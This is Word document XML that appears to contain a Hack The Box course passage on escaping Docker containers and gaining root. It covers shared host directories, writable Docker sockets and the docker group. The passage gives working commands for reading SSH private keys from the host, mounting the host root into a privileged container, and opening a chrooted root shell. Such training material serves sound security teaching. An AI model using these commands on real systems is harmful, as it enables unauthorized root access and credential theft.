    <w:p w14:paraId="6A3837CF"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When we get access to the docker container and enumerate it locally, we might find additional (non-standard) directories on the docker’s filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C1E894" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Docker Shared Directories </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F042A36"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root@container:~$ cd /hostsystem/home/cry0l1t3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD45F84"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root@container:/hostsystem/home/cry0l1t3$ ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27611535"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2776C51"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-rw-------  1 cry0l1t3 cry0l1t3  12559 Jun 30 15:09 .bash_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A834601"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-rw-r--r--  1 cry0l1t3 cry0l1t3    220 Jun 30 15:09 .bash_logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29216164"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-rw-r--r--  1 cry0l1t3 cry0l1t3   3771 Jun 30 15:09 .bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A208AE"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drwxr-x--- 10 cry0l1t3 cry0l1t3   4096 Jun 30 15:09 .ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6333BC66"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2CF6FF1"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B066283"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root@container:/hostsystem/home/cry0l1t3$ cat .ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE465C"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BDDFA2F"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-----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3B0D8"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D342B28"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From here on, we could copy the contents of the private SSH key to </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cry0l1t3.priv</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and use it to log in as the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cry0l1t3</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65686B74" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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Docker Shared Directories </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF3DBE"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yovecio@htb[/htb]$ ssh cry0l1t3@&lt;host IP&gt; -i cry0l1t3.piv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0220A4DA" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Sockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960F85E"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A Docker socket or Docker daemon socket is a special file that allows us and processes to communicate with the Docker daemon. This communication occurs either through a Unix socket or a network socket, depending on the configuration of our Docker setup. It acts as a bridge, facilitating communication between the Docker client and the Docker daemon. When we issue a command through the Docker CLI, the Docker client sends the command to the Docker socket, and the Docker daemon, in turn, processes the command and carries out the requested actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824F854"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Nevertheless, Docker sockets require appropriate permissions to ensure secure communication and prevent unauthorized access. Access to the Docker socket is typically restricted to specific users or user groups, ensuring that only trusted individuals can issue commands and interact with the Docker daemon. By exposing the Docker socket over a network interface, we can remotely manage Docker hosts, issue commands, and control containers and other resources. This remote API access expands the possibilities for distributed Docker setups and remote management scenarios. However, depending on the configuration, there are many ways where automated processes or tasks can be stored. Those files can contain very useful information for us that we can use to escape the Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57989E" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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Docker Sockets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486A0AB"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htb-student@container:~/app$ ls -al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE8D98"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E1AF961"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total 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDDCD24"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drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77139BD1"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drwxr-xr-x 1 root        root        4096 Jun 30 15:12 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D948A"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srw-rw---- 1 root        root           0 Jun 30 15:27 docker.sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29485677"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From here on, we can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to interact with the socket and enumerate what docker containers are already running. If not installed, then we can download it </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00092071">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and upload it to the Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729CF06" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Docker Sockets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F7F111"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htb-student@container:/tmp$ wget https://&lt;parrot-os&gt;:443/docker -O docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E81BDA"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htb-student@container:/tmp$ chmod +x docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E814BA4"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htb-student@container:/tmp$ ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FBD6E"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552D930"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-rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7662D110"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7FB4FB8"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F2E17E5"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htb-student@container:~/tmp$ /tmp/docker -H unix:///app/docker.sock ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76575BB1"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0659BA7"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CONTAINER ID     IMAGE         COMMAND                 CREATED       STATUS           PORTS     NAMES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2510FD02"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3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago    Up 12 minutes    443/tcp   app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6F711"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470109A3"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We can create our own Docker container that maps the host’s root directory (</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/hostsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory on the container. With this, we will get full access to the host system. Therefore, we must map these directories accordingly and use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>main_app</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB907A" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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Docker Sockets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B425F21"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htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C484169"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htb-student@container:~/app$ /tmp/docker -H unix:///app/docker.sock ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0263D5"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5BCEAFA"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CONTAINER ID     IMAGE         COMMAND                 CREATED           STATUS           PORTS     NAMES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F3164"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7ae3bcc818af     main_app      "/docker-entry.s..."    12 seconds ago    Up 8 seconds     443/tcp   app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F66A87D"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3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago        Up 17 minutes    443/tcp   app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A911C"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7DC6DF"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Now, we can log in to the new privileged Docker container with the ID </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>7ae3bcc818af</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/hostsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4341D7" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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Docker Sockets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68418D13"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htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE060B"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BCA9C4D"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6DB1AAD"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root@7ae3bcc818af:~# cat /hostsystem/root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B3D7B"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4928156"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-----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23787837"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA8A3C1"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From there, we can again try to grab the private SSH key and log in as root or as any other user on the system with a private SSH key in its folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F11C8" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A0A5C"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To gain root privileges through Docker, the user we are logged in with must be in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> group. This allows him to use and control the Docker daemon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC4A0F" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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Docker Group </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE1E4BB"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docker-user@nix02:~$ id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1810DE7C"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A33FAF6"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uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F86E3"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Alternatively, Docker may have SUID set, or we are in the Sudoers file, which permits us to run </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root. All three options allow us to work with Docker to escalate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15566BF0"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Most hosts have a direct internet connection because the base images and containers must be downloaded. However, many hosts may be disconnected from the internet at night and outside working hours for security reasons. However, if these hosts are located in a network where, for example, a web server has to pass through, it can still be reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7795E1"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To see which images exist and which we can access, we can use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD9B5A" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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Docker Group </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD9188"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docker-user@nix02:~$ docker image ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC4CCF9"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BF839A2"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REPOSITORY                           TAG                 IMAGE ID       CREATED         SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7D923"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ubuntu                               20.04               20fffa419e3a   2 days ago    72.8MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E1F306" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3508D0" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="0009207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A case that can also occur is when the Docker socket is writable. Usually, this socket is located in </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. However, the location can understandably be different. Because basically, this can only be written by the root or docker group. If we act as a user, not in one of these two groups, and the Docker socket still has the privileges to be writable, then we can still use this case to escalate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A01963" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Socket </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFAAE54"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docker-user@nix02:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE8B4F"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433116B"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root@ubuntu:~# ls -l /mnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263006CC"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B817A2E"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total 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513907C8"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lrwxrwxrwx   1 root root     7 Apr 23  2020 bin -&gt; usr/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC7207"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drwxr-xr-x   4 root root  4096 Sep 22 11:34 boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF3F5F"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drwxr-xr-x   2 root root  4096 Oct  6  2021 cdrom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F0EA1"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drwxr-xr-x  19 root root  3940 Oct 24 13:28 dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E311EB6"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drwxr-xr-x 100 root root  4096 Sep 22 13:27 etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D741F5B"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drwxr-xr-x   3 root root  4096 Sep 22 11:06 home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE3CDFD"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lrwxrwxrwx   1 root root     7 Apr 23  2020 lib -&gt; usr/lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306213FD"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lrwxrwxrwx   1 root root     9 Apr 23  2020 lib32 -&gt; usr/lib32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5A9C7"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lrwxrwxrwx   1 root root     9 Apr 23  2020 lib64 -&gt; usr/lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176EFB1B"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lrwxrwxrwx   1 root root    10 Apr 23  2020 libx32 -&gt; usr/libx32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A3FD0C"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   2 root root 16384 Oct  6  2021 lost+found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F7EB8"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drwxr-xr-x   2 root root  4096 Oct 24 13:28 media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D05A6"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drwxr-xr-x   2 root root  4096 Apr 23  2020 mnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6EA2F9"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drwxr-xr-x   2 root root  4096 Apr 23  2020 opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416EF310"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dr-xr-xr-x 307 root root     0 Oct 24 13:28 proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586F8706"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   6 root root  4096 Sep 26 21:11 root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499BE5B1"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drwxr-xr-x  28 root root   920 Oct 24 13:32 run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7A272"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lrwxrwxrwx   1 root root     8 Apr 23  2020 sbin -&gt; usr/sbin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AFE5E1"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drwxr-xr-x   7 root root  4096 Oct  7  2021 snap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412A2F6"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lastRenderedPageBreak/>
        <w:t>drwxr-xr-x   2 root root  4096 Apr 23  2020 srv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A027002"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dr-xr-xr-x  13 root root     0 Oct 24 13:28 sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A900937"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drwxrwxrwt  13 root root  4096 Oct 24 13:44 tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BE7300"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drwxr-xr-x  14 root root  4096 Sep 22 11:11 usr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E8FAF"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2071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>drwxr-xr-x  13 root root  4096 Apr 23  2020 var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EAE764" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="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EB71059" w14:textId="77777777" w:rsidR="00213442" w:rsidRPr="00092071" w:rsidRDefault="00213442" w:rsidP="00092071"/>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="00092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54D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="750A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109BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A326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F4D54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C35C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601934">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="582683884">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2001810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1F"/>
    <w:rsid w:val="00092071"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00FA5C1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57EC"/>
  <w15:chartTrackingRefBased/>
